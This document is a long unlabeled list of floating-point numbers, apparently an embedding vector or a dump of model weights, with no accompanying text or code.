-0.010487636551260948, 0.040020398795604706, -0.02029670588672161, -0.033536311239004135, 0.015124513767659664, 0.0021770705934613943, 0.037999775260686874, 0.001850981148891151, -0.027157776057720184, 0.02037210203707218, -0.00946978572756052, 0.0040676346980035305, -0.008587648160755634, -0.007505709771066904, 0.020869718864560127, -0.04490608349442482, 0.00981660932302475, 0.021518127992749214, 0.009952322579920292, -0.02875618077814579, -0.018592746928334236, 0.01053287461400032, 0.0251673124730587, -0.0187887791544199, -0.007151346653699875, 0.024202238768339157, -0.01250826008617878, 0.002936689183115959, 0.005138263572007418, -0.008308681659400463, 0.011648740619421005, 0.0018274198519065976, -0.010985252447426319, 0.00046722195111215115, 0.0003437603882048279, 0.046655282378196716, 0.0204776581376791, -0.03263155370950699, -0.02512207441031933, 0.01322452537715435, 0.00849717203527689, 0.0032118859235197306, -0.02486572600901127, 0.027429204434156418, 0.022995896637439728, 0.01578800193965435, 0.05220445618033409, 0.0008208780782297254, 0.022845104336738586, -0.007117418572306633, 0.008851535618305206, 0.014272535219788551, -0.03311409056186676, -0.003700077533721924, -0.0032816275488585234, -0.042101338505744934, 0.009409468621015549, -0.00008164014434441924, 0.027595074847340584, 0.029902204871177673, -0.016873709857463837, -0.014400708489120007, -0.016647521406412125, -0.00742654362693429, -0.010442398488521576, 0.023086372762918472, 0.015320545062422752, -0.025061756372451782, -0.015757843852043152, 0.03673311695456505, 0.032510921359062195, 0.011007871478796005, 0.00215256679803133, 0.009869386442005634, -0.016677679494023323, 0.0034305353183299303, -0.021186383441090584, -0.009876926429569721, -0.03329504281282425, 0.003102560993283987, 0.004538862034678459, 0.01373722031712532, 0.015079276636242867, 0.029721254482865334, -0.037306129932403564, -0.0042108879424631596, 0.019361790269613266, 0.01991972327232361, 0.0410156324505806, -0.002540857996791601, 0.026675239205360413, 0.0298569668084383, 0.00016575423069298267, -0.007396385073661804, -0.020869718864560127, -0.03426011651754379, -0.03492360562086105, 0.002395719988271594, 0.024549061432480812, -0.015531654469668865, -0.013382857665419579, -0.022241933271288872, 0.02783634327352047, 0.034229956567287445, -0.021819712594151497, 0.0009000442805700004, 0.011972945183515549, 0.004923383705317974, -0.003701962297782302, -0.017099900171160698, 0.00039724467205815017, 0.04279498755931854, -0.027866503223776817, 0.012055881321430206, 0.012191594578325748, 0.0006130668334662914, 0.0031346045434474945, -0.01104556955397129, -0.030264107510447502, -0.001305299811065197, -0.005217429716140032, 0.0047273533418774605, -0.020975273102521896, -0.019980041310191154, 0.04125690087676048, -0.019693534821271896, 0.017009424045681953, -0.009567800909280777, 0.013948330655694008, -0.02150304801762104, 0.016798313707113266, -0.015591971576213837, -0.02706730179488659, -0.00016975965991150588, -0.0435791090130806, 0.015607050620019436, 0.02186495065689087, -0.00030959639116190374, 0.009168200194835663, 0.022573675960302353, -0.010932475328445435, 0.006582104135304689, 0.023795098066329956, 0.004060095176100731, -0.022573675960302353, 0.008467013947665691, -0.027383966371417046, 0.028288722038269043, 0.009417007677257061, -0.02568000741302967, 0.0038640645798295736, 0.016210222616791725, -0.003483312902972102, -0.013337619602680206, -0.0238855741918087, -0.009515023790299892, -0.022226853296160698, -0.051963187754154205, 0.0012157666496932507, -0.0002120523276971653, 0.0013222640845924616, -0.007222973275929689, 0.008889233693480492, 0.017627673223614693, 0.00912296213209629, -0.01658720336854458, 0.007441622670739889, 0.0043767597526311874, 0.005926155485212803, -0.012998335994780064, 0.03462201729416847, -0.014174520038068295, 0.004361680708825588, -0.001291163032874465, 0.0057452041655778885, -0.011633661575615406, 0.02896728925406933, -0.01217651553452015, -0.021895108744502068, -0.0018886793404817581, 0.01054795365780592, 0.012681671418249607, -0.02919347956776619, 0.014483644627034664, -0.0015069851651787758, 0.008301141671836376, 0.01217651553452015, -0.014023726806044579, -0.02681095339357853, -0.010321764275431633, 0.019165759906172752, -0.009168200194835663, 0.03226965293288231, -0.025740325450897217, -0.011965406127274036, 0.006257899571210146, -0.010842000134289265, 0.009861846454441547, 0.028228405863046646, -0.007158886641263962, 0.02062845043838024, -0.017929259687662125, 0.016466569155454636, -0.005345603451132774, 0.021201463416218758, 0.006691428832709789, -0.02970617450773716, 0.010962634347379208, 0.019648296758532524, -0.02952522225677967, 0.01845703460276127, 0.019678454846143723, 0.028409356251358986, 0.04487592726945877, -0.024262554943561554, 0.00793169904500246, -0.007268211338669062, 0.03649184852838516, 0.003916841931641102, -0.0025804410688579082, 0.014468565583229065, -0.028288722038269043, 0.022618914023041725, -0.014257456175982952, -0.011890009045600891, -0.01323960442095995, 0.03178711608052254, -0.00269165076315403, 0.009620578028261662, -0.023780018091201782, 0.008708282373845577, 0.01955782063305378, -0.021744316443800926, -0.01743164286017418, 0.022362567484378815, 0.00016540080832783133, -0.04116642475128174, -0.02267923206090927, -0.010872158221900463, -0.02209113910794258, -0.027338728308677673, 0.03193790838122368, -0.01735624670982361, 0.012809845618903637, -0.023825256153941154, -0.007909080013632774, 0.023056212812662125, 0.01985940709710121, 0.010804301127791405, -0.007347377482801676, 0.007660272531211376, -0.014106662943959236, 0.018185608088970184, 0.009273755364120007, -0.012221753597259521, 0.002514469437301159, 0.009236056357622147, -0.04936955124139786, 0.012689211405813694, -0.020010199397802353, 0.017642753198742867, -0.00023526027507614344, 0.0060656387358903885, 0.01985940709710121, -0.007441622670739889, -0.011754295788705349, -0.022573675960302353, 0.01131699699908495, 0.003741545369848609, 0.013330080546438694, -0.009424547664821148, -0.0006526499055325985, -0.01182969193905592, 0.05718061700463295, -0.00158426642883569, -0.002145027043297887, -0.015373322181403637, -0.005032708402723074, -0.004354141186922789, -0.04508703574538231, -0.012191594578325748, -0.00009353863424621522, -0.00022183029795996845, 0.009567800909280777, 0.0384521558880806, 0.03682359308004379, -0.030520455911755562, 0.02055305428802967, -0.005692427046597004, -0.004369220230728388, -0.0016587204299867153, -0.0298569668084383, 0.01714513637125492, -0.01593879424035549, 0.02798713743686676, 0.01824592426419258, -0.012651512399315834, -0.005654728505760431, 0.02780618518590927, 0.0028801418375223875, -0.010065416805446148, -0.028258563950657845, 0.025393500924110413, -0.008602727204561234, -0.03519503027200699, -0.0073096794076263905, 0.03136489540338516, 0.005681117530912161, -0.007886461913585663, -0.04388069361448288, -0.0002210056409239769, -0.02014591358602047, 0.016753075644373894, 0.05003304034471512, -0.005515245255082846, 0.013699522241950035, -0.02106574922800064, 0.0209149569272995, 0.0005880917888134718, -0.05374253913760185, -0.005428539589047432, -0.02783634327352047, -0.014378090389072895, -0.008270982652902603, -0.0012393280630931258, 0.012025723233819008, -0.04297593608498573, -0.03893469274044037, 0.03962833806872368, 0.025046678259968758, 0.004225966986268759, -0.023327641189098358, -0.008255903609097004, 0.00037250525201670825, -0.0005970451165921986, 0.010291606187820435, 0.008987248875200748, 0.002246812218800187, -0.009115422144532204, -0.010487636551260948, 0.04421243816614151, 0.015772923827171326, 0.016255460679531097, 0.007238052785396576, 0.01536578219383955, -0.002606829861178994, 0.020568132400512695, -0.030490295961499214, -0.017627673223614693, 0.004780130460858345, -0.04011087492108345, 0.01930147409439087, -0.002446612576022744, 0.03226965293288231, 0.011709057725965977, 0.014913404360413551, -0.0226339939981699, 0.007611264940351248, -0.00009772078192327172, -0.04324736446142197, -0.0588393360376358, 0.018668144941329956, 0.0023976049851626158, -0.020191151648759842, 0.009741212241351604, 0.005028938874602318, 0.021623682230710983, 0.0007468953845091164, -0.0029461137019097805, 0.007501939777284861, -0.04098547250032425, -0.0026294488925486803, -0.013752300292253494, -0.02281494438648224, -0.025981593877077103, 0.0019339171703904867, 0.026102228090167046, -0.002410799264907837, 0.0007091971929185092, 0.002116753486916423, 0.009100343100726604, -0.023945890367031097, -0.0004450742562767118, -0.03570772707462311, -0.012018183246254921, -0.014234837144613266, -0.005413460079580545, 0.0221966952085495, -0.006190042942762375, 0.023161768913269043, -0.02014591358602047, -0.0011592194205150008, -0.021216541528701782, 0.021186383441090584, 0.010819381102919579, 0.03471249341964722, -0.02852999046444893, -0.012960637919604778, 0.010849539190530777, 0.028469674289226532, -0.020824480801820755, 0.0051797316409647465, -0.017537198960781097, -0.015591971576213837, -0.006352145224809647, 0.03091251663863659, 0.0268561914563179, 0.046956866979599, -0.022845104336738586, 0.03317440673708916, -0.033204566687345505, -0.02637365460395813, 0.0033362898975610733, -0.004644417203962803, -0.030414899811148643, 0.017884021624922752, 0.03827120363712311, 0.0015145248034968972, -0.0038282512687146664, -0.0226339939981699, 0.022573675960302353, 0.02937442995607853, -0.006665040273219347, -0.021216541528701782, -0.0038678343407809734, 0.008761059492826462, 0.034742653369903564, -0.034079164266586304, 0.00625413004308939, 0.009733673185110092, -0.014528882689774036, -0.012772146612405777, -0.020899876952171326, -0.018366558477282524, -0.03293313831090927, -0.004372990224510431, 0.030007759109139442, 0.0034248805604875088, -0.03311409056186676, 0.007068410981446505, -0.005006319843232632, 0.016873709857463837, -0.019648296758532524, -0.004146800842136145, -0.033355358988046646, 0.01640625298023224, 0.010811841115355492, -0.01278722658753395, 0.008783678524196148, -0.00939438957720995, -0.020945115014910698, 0.013036034069955349, 0.03127441927790642, 0.05500920116901398, -0.025182390585541725, 0.009092804044485092, -0.015177291817963123, 0.001517352182418108, 0.0021751855965703726, 0.019150681793689728, -0.004746202379465103, -0.0055680228397250175, 0.026826033368706703, 0.0005508647882379591, -0.0029630777426064014, -0.0011243484914302826, 0.004542632028460503, -0.004614258650690317, -0.01850227266550064, -0.017311008647084236, 0.02337287925183773, -0.013857854530215263, -0.0332648828625679, 0.014732453040778637, 0.04372990131378174, 0.004776360932737589, -0.033536311239004135, 0.009620578028261662, -0.0013401707401499152, 0.022257011383771896, 0.016315776854753494, -0.01519991084933281, -0.0025653617922216654, -0.022920500487089157, 0.019165759906172752, -0.012870162725448608, 0.05030446499586105, -0.03715533763170242, -0.011776914820075035, -0.00580552127212286, -0.0034248805604875088, -0.018622906878590584, -0.0038753740955144167, -0.02450382336974144, -0.0028688323218375444, -0.017114978283643723, 0.007871381938457489, -0.0285752285271883, -0.0315760038793087, -0.005142033100128174, 0.0029706174973398447, 0.004007317591458559, 0.0019376870477572083, -0.005432309117168188, 0.006732896901667118, 0.0269165076315403, -0.018215766176581383, -0.019060205668210983, 0.030776802450418472, -0.02289034239947796, 0.021699078381061554, -0.009711054153740406, -0.015516575425863266, -0.01809513196349144, -0.026795873418450356, -0.007320988457649946, -0.014543961733579636, 0.020130833610892296, -0.028545070439577103, 0.03727596998214722, 0.0034135712776333094, -0.024096684530377388, 0.015177291817963123, -0.0243228729814291, -0.021442731842398643, -0.020643528550863266, 0.005296595860272646, -0.005032708402723074, 0.007328528445214033, -0.012764607556164265, 0.020191151648759842, 0.10627873986959457, -0.034410908818244934, 0.009198358282446861, -0.021623682230710983, 0.018517350777983665, 0.009952322579920292, 0.011022951453924179, 0.013563808985054493, -0.006193812936544418, 0.020749084651470184, 0.016496729105710983, -0.02029670588672161, -0.002927264431491494, 0.01563720963895321, 0.009801529347896576, -0.010736444965004921, -0.003311786102131009, -0.008451933972537518, 0.01696418598294258, -0.02168400026857853, -0.004327752161771059, 0.0038207117468118668, 0.015245147980749607, 0.001757678110152483, 0.02678079530596733, -0.023568909615278244, 0.0001364203344564885, -0.010080495849251747, -0.03715533763170242, -0.016361014917492867, 0.0027783566620200872, -0.01408404391258955, -0.018336400389671326, -0.010442398488521576, 0.0046519567258656025, -0.01300587598234415, 0.005421000067144632, -0.017386404797434807, -0.016798313707113266, -0.007023172918707132, 0.008120190352201462, -0.005918615963310003, -0.02286018244922161, 0.000485835422296077, 0.013036034069955349, -0.02227209135890007, 0.013744760304689407, 0.01820068620145321, -0.009447166696190834, -0.012372545897960663, 0.009869386442005634, -0.01428761426359415, 0.020673688501119614, 0.028891893103718758, 0.01593879424035549, 0.02970617450773716, 0.007151346653699875, -0.011113426648080349, -0.020462578162550926, -0.01032930426299572, 0.004504933953285217, 0.018140370026230812, -0.034772809594869614, 0.008399156853556633, 0.0004698137054219842, 0.00009636599861551076, -0.02673555724322796, 0.009748752228915691, -0.026494288817048073, 0.013955870643258095, -0.00547754717990756, 0.019316552206873894, 0.010600731708109379, -0.014023726806044579, 0.009854307398200035, 0.010231289081275463, 0.00976383127272129, 0.03242044523358345, -0.04029182717204094, 0.010774143040180206, 0.03863310441374779, 0.019753852859139442, -0.011090807616710663, 0.04113626480102539, 0.0008849650039337575, 0.031304579228162766, -0.028153009712696075, -0.007464241702109575, -0.007976937107741833, -0.00005404389230534434, -0.0006455815164372325, 0.00925113633275032, 0.014732453040778637, 0.012304689735174179, 0.01860782690346241, 0.01619514264166355, 0.006906308699399233, -0.014325312338769436, -0.012259451672434807, -0.015908636152744293, 0.01003525871783495, -0.005726355127990246, 0.017899101600050926, -0.022407805547118187, 0.0040110875852406025, -0.011128505691885948, -0.0027896661777049303, 0.014053885824978352, 0.008067413233220577, -0.003061093157157302, -0.03555693477392197, -0.0001506749540567398, 0.018954649567604065, -0.00036001772969029844, -0.010917396284639835, 0.02652444690465927, 0.01139239314943552, -0.010193591006100178, -0.013918171636760235, -0.028439514338970184, -0.014898325316607952, -0.02355382964015007, 0.043609268963336945, -0.012282070703804493, 0.006570794619619846, -0.0008331300341524184, -0.00441445829346776, -0.0030686326790601015, 0.02314668893814087, 0.012463022023439407, 0.02552921511232853, 0.005775362718850374, 0.008678123354911804, -0.004259895533323288, 0.018049893900752068, -0.027127617970108986, 0.03667280077934265, -0.006348375231027603, -0.01842687651515007, 0.0024711163714528084, -0.005496396217495203, 0.011015411466360092, 0.03519503027200699, -0.0019904645159840584, -0.013028495013713837, -0.0015192370628938079, -0.009974941611289978, 0.00569619657471776, 0.006774364970624447, 0.019829249009490013, -0.009703514166176319, -0.03359662741422653, 0.010593191720545292, 0.0234482754021883, -0.006559485103935003, 0.005760283675044775, 0.013903092592954636, -0.007283290382474661, -0.014762611128389835, 0.0028914513532072306, 0.0017425988335162401, -0.0008194644469767809, 0.021035591140389442, 0.0038791438564658165, -0.0044634658843278885, 0.035225190222263336, 0.012463022023439407, -0.030158553272485733, -0.01095509435981512, -0.01857766881585121, 0.02501652017235756, -0.0011026720749214292, -0.022513359785079956, 0.0032985915895551443, -0.007705510128289461, 0.013511031866073608, -0.0003072402614634484, 0.010947554372251034, 0.031334735453128815, -0.024443507194519043, 0.0007134382613003254, 0.019241156056523323, 0.02542365901172161, 0.003901762655004859, 0.006747975945472717, -0.041407693177461624, -0.00559441139921546, 0.007351147010922432, -0.03929659351706505, 0.012078500352799892, 0.01054795365780592, 0.03715533763170242, -0.0021657610777765512, -0.0204776581376791, 0.0005475662183016539, -0.0037603946402668953, -0.004761281423270702, 0.00035059318179264665, -0.008647965267300606, 0.0009650737047195435, 0.002936689183115959, -0.013691983185708523, -0.020085595548152924, 0.004723583348095417, -0.008180507458746433, -0.03416964039206505, 0.003999778069555759, 0.015335624106228352, -0.008467013947665691, 0.006665040273219347, -0.009665816091001034, -0.015313005074858665, -0.005142033100128174, 0.0007619746611453593, -0.011626122519373894, 0.015207449905574322, 0.0001446668029529974, -0.007200354244560003, 0.008580108173191547, 0.001357134897261858, -0.006616032682359219, -0.0010480097262188792, -0.0021770705934613943, 0.005481317173689604, -0.012757067568600178, 0.01203326229006052, 0.02160860225558281, -0.0285752285271883, 0.006039250176399946, 0.010502715595066547, -0.04113626480102539, -0.016059428453445435, -0.014770151115953922, 0.017099900171160698, -0.016677679494023323, -0.02970617450773716, 0.016255460679531097, 0.0015465682372450829, 0.01118882279843092, -0.008595187216997147, 0.0005310732522048056, -0.01225191168487072, -0.012643973343074322, 0.0004914901801384985, 0.00601663114503026, -0.00022406861535273492, -0.007607494946569204, -0.014023726806044579, -0.02025146782398224, 0.03172679618000984, -0.007848762907087803, 0.007494400255382061, -0.01144517119973898, -0.008467013947665691, -0.011068188585340977, 0.019437186419963837, 0.007155116647481918, 0.008527331054210663, 0.00688745966181159, 0.005748974159359932, 0.0031308347824960947, -0.006993014365434647, -0.025378422811627388, 0.00668388931080699, -0.018261004239320755, 0.01607450842857361, -0.009386849589645863, -0.009824148379266262, 0.009447166696190834, -0.003483312902972102, 0.019934803247451782, 0.006540636066347361, 0.002804745454341173, -0.012855082750320435, -0.0065180170349776745, 0.007313448935747147, -0.004327752161771059, -0.004169419873505831, -0.002024392830207944, 0.002184610115364194, -0.0059525445103645325, 0.059140920639038086, 0.001849096268415451, -0.018080051988363266, 0.0040789442136883736, -0.045479096472263336, -0.02806253358721733, -0.007241822313517332, -0.009680895134806633, -0.02032686397433281, 0.0010875927982851863, 0.028107771649956703, 0.005126954056322575, -0.007626343984156847, 0.025393500924110413, 0.0010140812955796719, -0.008542410098016262, 0.01377491932362318, -0.01699434407055378, -0.0040110875852406025, 0.0023617916740477085, 0.05440602824091911, 0.009756292216479778, 0.006729126907885075, 0.0003508287773001939, 0.007675351575016975, -0.01699434407055378, -0.013578888028860092, 0.013850315473973751, -0.02270939014852047, 0.0030026608146727085, 0.012048342265188694, -0.013797537423670292, -0.022332407534122467, 0.010359463281929493, -0.023312561213970184, -0.006389843299984932, -0.0026388734113425016, -0.014038805849850178, 0.005895996931940317, 0.013420555740594864, -0.012561037205159664, -0.029615698382258415, -0.027052221819758415, -0.016210222616791725, 0.009326532483100891, 0.009017406962811947, 0.007803525310009718, -0.015516575425863266, -0.01725069247186184, 0.005409690551459789, 0.01860782690346241, 0.034561701118946075, -0.008391616865992546, -0.0076414234936237335, -0.020085595548152924, 0.01388047356158495, 0.018034813925623894, 0.004640647210180759, -0.009092804044485092, -0.03688390925526619, 0.007547177840024233, -0.0061410353519022465, 0.018984809517860413, 0.01842687651515007, -0.002516354201361537, 0.012659052386879921, 0.014129281975328922, 0.005409690551459789, -0.021744316443800926, -0.011234060861170292, 0.01066104881465435, -0.003257123753428459, 0.005552943330258131, -0.018592746928334236, 0.019980041310191154, 0.0015258343191817403, 0.012591195292770863, 0.01280230563133955, -0.013435634784400463, -0.021849870681762695, 0.0025446279905736446, -0.020417340099811554, 0.0007318161078728735, 0.00998248066753149, -0.015373322181403637, 0.010178511962294579, 0.011995564214885235, -0.00274254335090518, -0.007788446266204119, -0.004749971907585859, 0.008172967471182346, 0.015803081914782524, 0.01780862547457218, 0.006706508342176676, -0.015282846987247467, 0.011791993863880634, -0.03567756712436676, -0.016285618767142296, 0.017205454409122467, 0.02252843976020813, -0.009236056357622147, 0.0014061424881219864, 0.012259451672434807, -0.005899766925722361, 0.005409690551459789, -0.013186827301979065, 0.005281516350805759, -0.007479321211576462, -0.01003525871783495, 0.002765162382274866, -0.005194810684770346, 0.017672911286354065, 0.02381017804145813, 0.008866614662110806, 0.007471781224012375, 0.009537641890347004, -0.0025729015469551086, -0.03226965293288231, 0.005360682960599661, 0.008813836611807346, 0.008044794201850891, 0.015313005074858665, 0.014898325316607952, 0.000309360766550526, 0.015471337363123894, -0.008889233693480492, 0.00152960408013314, 0.04487592726945877, -0.004908304661512375, 0.01428761426359415, 0.0032043461687862873, 0.007713049650192261, -0.013812617398798466, -0.023945890367031097, 0.0016492957947775722, 0.0026464129332453012, 0.009228517301380634, -0.01853243075311184, -0.003530435496941209, 0.01562213059514761, -0.02545381896197796, -0.0243530310690403, -0.030791882425546646, 0.010336844250559807, -0.005421000067144632, -0.001305299811065197, -0.013933251611888409, 0.002831134246662259, -0.017205454409122467, 0.004629337694495916, -0.002275085775181651, 0.0014570350758731365, -0.01875861920416355, 0.030233949422836304, 0.002378755947574973, -0.028997449204325676, -0.015471337363123894, 0.0035323204938322306, 0.00848209299147129, 0.011497948318719864, -0.0004886628012172878, -0.00815034843981266, 0.0025088146794587374, 0.006231511011719704, -0.006834682077169418, -0.01801973581314087, -0.012417783960700035, -0.013586428016424179, 0.007728129159659147, 0.014174520038068295, 0.009899544529616833, 0.008127730339765549, 0.026584764942526817, 0.014001107774674892, 0.01857766881585121, 0.008323760703206062, 0.005296595860272646, -0.01287770178169012, 0.0076979706063866615, 0.009349151514470577, -0.00904756598174572, 0.023795098066329956, 0.007313448935747147, 0.014770151115953922, 0.0027557378634810448, 0.002407029503956437, 0.006729126907885075, -0.0022977048065513372, 0.0032307349611073732, 0.014868166297674179, 0.008821376599371433, 0.013081272132694721, 0.0018255348550155759, 0.0051797316409647465, -0.01408404391258955, -0.009590419940650463, -0.0179443396627903, -0.010540414601564407, -0.003807517234236002, 0.009062645025551319, -0.005421000067144632, -0.01258365623652935, 0.015064196661114693, -0.016541965305805206, 0.006876150146126747, -0.011543186381459236, -0.006646191235631704, 0.010012639686465263, 0.015328084118664265, 0.004003548063337803, -0.004591639619320631, -0.007351147010922432, 0.01104556955397129, 0.03392837196588516, 0.022769708186388016, 0.006597183179110289, 0.022287171334028244, 0.009771371260285378, -0.015395941212773323, -0.00005807877460028976, -0.025619691237807274, 0.002595520345494151, 0.0016323316376656294, 0.0007746978080831468, -0.00785630289465189, -0.015079276636242867, -0.013277302496135235, -0.0027858964167535305, -0.018381638452410698, 0.002889566356316209, -0.0072342827916145325, -0.010540414601564407, 0.0011413127649575472, 0.0027915509417653084, 0.002129947766661644, -0.014445946551859379, -0.004923383705317974, -0.030233949422836304, -0.0011959751136600971, 0.013480872847139835, 0.014619358815252781, -0.011007871478796005, -0.028288722038269043, 0.005715045612305403, -0.007656502537429333, 0.006951546296477318, -0.005175961647182703, -0.017959417775273323, -0.006069408729672432, 0.01455904170870781, 0.0033758729696273804, -0.009190819226205349, -0.007795985788106918, -0.006156114395707846, 0.0035473997704684734, 0.009567800909280777, -0.012048342265188694, 0.011633661575615406, -0.028439514338970184, 0.0016474109143018723, -0.02286018244922161, 0.0039055326487869024, 0.015441179275512695, 0.017416564747691154, -0.0014985031448304653, -0.0032910520676523447, 0.008135269396007061, -0.008542410098016262, -0.0016031155828386545, 0.0004785314085893333, -0.006344605702906847, 0.00547754717990756, -0.020673688501119614, -0.0025182391982525587, 0.01104556955397129, 0.004949772264808416, 0.005285286344587803, 0.007954318076372147, 0.013586428016424179, 0.0017897216603159904, -0.00732475845143199, 0.030007759109139442, 0.00835391879081726, 0.002942343708127737, 0.01293047983199358, -0.007091029547154903, 0.00926621537655592, -0.00023584930750075728, -0.00989200547337532, -0.006310677155852318, 0.0006059984443709254, -0.004048785660415888, 0.015456258319318295, -0.0045200129970908165, -0.0009122962364926934, 0.017778467386960983, -0.025152232497930527, -0.012410243973135948, -0.008376537822186947, 0.007249362301081419, 0.00835391879081726, -0.04544894024729729, -0.008806297555565834, -0.013548729941248894, -0.03260139375925064, 0.020688766613602638, -0.012304689735174179, -0.0054926262237131596, 0.0030667479149997234, 0.008889233693480492, 0.018155448138713837, -0.031153785064816475, 0.01223683264106512, -0.010932475328445435, -0.017748307436704636, -0.014528882689774036, 0.0024390730541199446, -0.01025390811264515, 0.027353806421160698, -0.020537974312901497, 0.0076225739903748035, -0.01011065486818552, -0.015561813488602638, -0.024443507194519043, -0.0010687437606975436, 0.03429027274250984, -0.019316552206873894, -0.024006208404898643, -0.01773322932422161, 0.012764607556164265, -0.005213659722357988, -0.011693978682160378, -0.00012110544048482552, 0.012297149747610092, -0.007833683863282204, 0.018125290051102638, -0.010517795570194721, -0.021382413804531097, -0.023161768913269043, 0.011053109541535378, 0.0010206785518676043, 0.006110876798629761, -0.0033739879727363586, -0.0064727794378995895, 0.0043993787840008736, 0.01477769110351801, -0.029947442933917046, 0.016677679494023323, -0.0008642310276627541, 0.0018443840090185404, 0.017748307436704636, 0.007279520854353905, 0.023764939978718758, -0.008172967471182346, 0.04523782804608345, 0.004885685630142689, -0.004712273832410574, 0.017703071236610413, 0.019331632182002068, -0.009092804044485092, -0.01443086750805378, -0.026056990027427673, 0.0010216209338977933, -0.0037867831997573376, 0.019422108307480812, 0.02652444690465927, -0.008663044311106205, -0.010593191720545292, 0.013933251611888409, -0.0065293265506625175, 0.01159596350044012, -0.0032118859235197306, 0.023026054725050926, 0.008007096126675606, -0.01780862547457218, -0.004893225152045488, 0.011158664710819721, 0.001611597603186965, 0.004512473475188017, 0.021156225353479385, 0.012553497217595577, -0.011935247108340263, 0.0012421554420143366, -0.006789444014430046, 0.01783878356218338, -0.013201906345784664, 0.010585651732981205, 0.020387182012200356, -0.0010423549683764577, -0.01182969193905592, 0.00818804744631052, -0.01378999836742878, 0.008580108173191547, -0.013043574057519436, -0.012651512399315834, -0.005545403808355331, -0.00601663114503026, -0.009386849589645863, -0.0008835513726808131, 0.01159596350044012, -0.006420001853257418, -0.003619026392698288, 0.003128949785605073, -0.017703071236610413, -0.022211773321032524, -0.0002989937784150243, 0.0025521675124764442, -0.004565251059830189, 0.0024258785415440798, 0.022136377170681953, -0.0026426431722939014, 0.0213220976293087, -0.005093025509268045, -0.004889455158263445, -0.04044261947274208, -0.009296373464167118, 0.008316220715641975, 0.00709856953471899, 0.0054926262237131596, 0.018366558477282524, -0.009085264056921005, -0.010397161357104778, 0.0037302360869944096, -0.0004238690307829529, 0.011874930001795292, 0.0065180170349776745, 0.0009726133430376649, 0.02549905702471733, -0.0068384516052901745, 0.0277307890355587, -0.0187887791544199, -0.007517019286751747, 0.0013599622761830688, 0.002288280287757516, 0.02073400467634201, 0.017853863537311554, -0.011709057725965977, 0.02542365901172161, 0.0031779573764652014, -0.02293557859957218, 0.009582879953086376, 0.011754295788705349, -0.025031598284840584, 0.008617806248366833, 0.01581816002726555, -0.03124426119029522, -0.029917284846305847, -0.016315776854753494, -0.003818826749920845, 0.00948486477136612, 0.016828471794724464, 0.01863798499107361, -0.01464951690286398, -0.000026462363166501746, -0.012229293584823608, 0.008859074674546719, -0.026826033368706703, -0.004214657936245203, -0.0026822262443602085, 0.03658232465386391, -0.003830136265605688, -0.0010536644840613008, -0.006080718245357275, -0.009311453439295292, 0.003988468553870916, -0.015848319977521896, -0.003115755505859852, -0.021985584869980812, 0.01981416903436184, 0.001823649974539876, 0.00625413004308939, -0.0009221920045092702, -0.006024171132594347, 0.01670783758163452, 0.000939156161621213, -0.014182059094309807, 0.012545958161354065, -0.00570373609662056, -0.017311008647084236, 0.0071136485785245895, 0.019316552206873894, 0.010743984021246433, 0.03350615128874779, -0.01153564639389515, 0.005515245255082846, 0.008859074674546719, -0.019542742520570755, -0.012862622737884521, 0.002889566356316209, -0.005311674904078245, -0.0031591083388775587, 0.02337287925183773, 0.0024428428150713444, -0.0006135380826890469, -0.00893447082489729, 0.01601419225335121, -0.01688878983259201, 0.01293047983199358, 0.005405920557677746, 0.00231278408318758, -0.0003696778730954975, -0.004670805763453245, 0.013232065364718437, 0.0409553162753582, 0.00913804117590189, -0.0039055326487869024, -0.003860294818878174, 0.01768799126148224, -0.009153121151030064, 0.010902317240834236, -0.009522562846541405, -0.020613370463252068, -0.010276527144014835, -0.004418227821588516, 0.007894000969827175, -0.016391173005104065, 0.0072455923072993755, 0.011249139904975891, -0.008489632979035378, 0.0073662265203893185, -0.036642640829086304, -0.016315776854753494, -0.002344827400520444, 0.018140370026230812, 0.009205898270010948, 0.000918893376365304, 0.010487636551260948, -0.0011611043009907007, -0.006435081362724304, -0.010992792434990406, 0.006827142555266619, -0.0332648828625679, 0.009220977313816547, -0.008640425279736519, -0.003125180024653673, -0.0046632662415504456, 0.012372545897960663, 0.01670783758163452, -0.010276527144014835, 0.01386539451777935, 0.01131699699908495, -0.016255460679531097, -0.02417208068072796, -0.004297593608498573, -0.012734448537230492, 0.023207006976008415, -0.02791174128651619, -0.0062088919803500175, 0.0009089976083487272, 0.012463022023439407, -0.012447942979633808, -0.004259895533323288, -0.014166980050504208, -0.004640647210180759, -0.01973877288401127, 0.009273755364120007, -0.009311453439295292, -0.02150304801762104, 0.03039982169866562, -0.0028179397340863943, -0.005447388626635075, 0.0035605940502136946, 0.01535070315003395, 0.007878921926021576, -0.020100675523281097, 0.007320988457649946, 0.016843551769852638, -0.013390397652983665, -0.01247056107968092, 0.007924159988760948, 0.007373766042292118, -0.012907860800623894, 0.01032930426299572, 0.028303802013397217, -0.0010687437606975436, 0.0038678343407809734, -0.010005099698901176, -0.01886417530477047, -0.005560483317822218, 0.006891229189932346, 0.011807073839008808, 0.02004035748541355, -0.028183167800307274, -0.007000553887337446, -0.00981660932302475, -0.01568244770169258, -0.006608492694795132, -0.009582879953086376, 0.0004782957839779556, 0.0026181393768638372, -0.000982980360276997, 0.004949772264808416, 0.01912052184343338, -0.008859074674546719, -0.004746202379465103, 0.0036831132601946592, -0.013691983185708523, -0.022739548236131668, 0.02498636022210121, 0.01706974022090435, 0.00451624346897006, -0.0002657722507137805, -0.01604435034096241, -0.004942232742905617, -0.003790553193539381, 0.014619358815252781, 0.018034813925623894, 0.0036001771222800016, 0.009839227423071861, -0.02311653085052967, -0.0023316331207752228, -0.005017629358917475, 0.04161880165338516, 0.025378422811627388, -0.00884399563074112, 0.01485308725386858, 0.001810455578379333, 0.007543407846242189, -0.010103114880621433, 0.006514247506856918, -0.009205898270010948, 0.009055105037987232, 0.028213325887918472, 0.0012685441179201007, 0.03465217724442482, -0.0005376704502850771, -0.00593369547277689, -0.010449938476085663, 0.019286394119262695, 0.001303414930589497, 0.01245548203587532, -0.01208604034036398, 0.012990796938538551, 0.01863798499107361, -0.006510477513074875, -0.021970504894852638, -0.007886461913585663, -0.022317329421639442, 0.010472557507455349, 0.042764827609062195, 0.005760283675044775, 0.012613814324140549, -0.011573344469070435, 0.012221753597259521, -0.00948486477136612, 0.012206674553453922, -0.013850315473973751, -0.024926044046878815, -0.0007280462887138128, 0.003257123753428459, 0.0020922496914863586, 0.02337287925183773, 0.02417208068072796, -0.028545070439577103, 0.0067932140082120895, -0.008519791066646576, -0.002248696982860565, -0.014483644627034664, 0.010872158221900463, -0.019618138670921326, -0.009220977313816547, 0.004192038904875517, -0.020869718864560127, -0.01853243075311184, -0.015252687968313694, 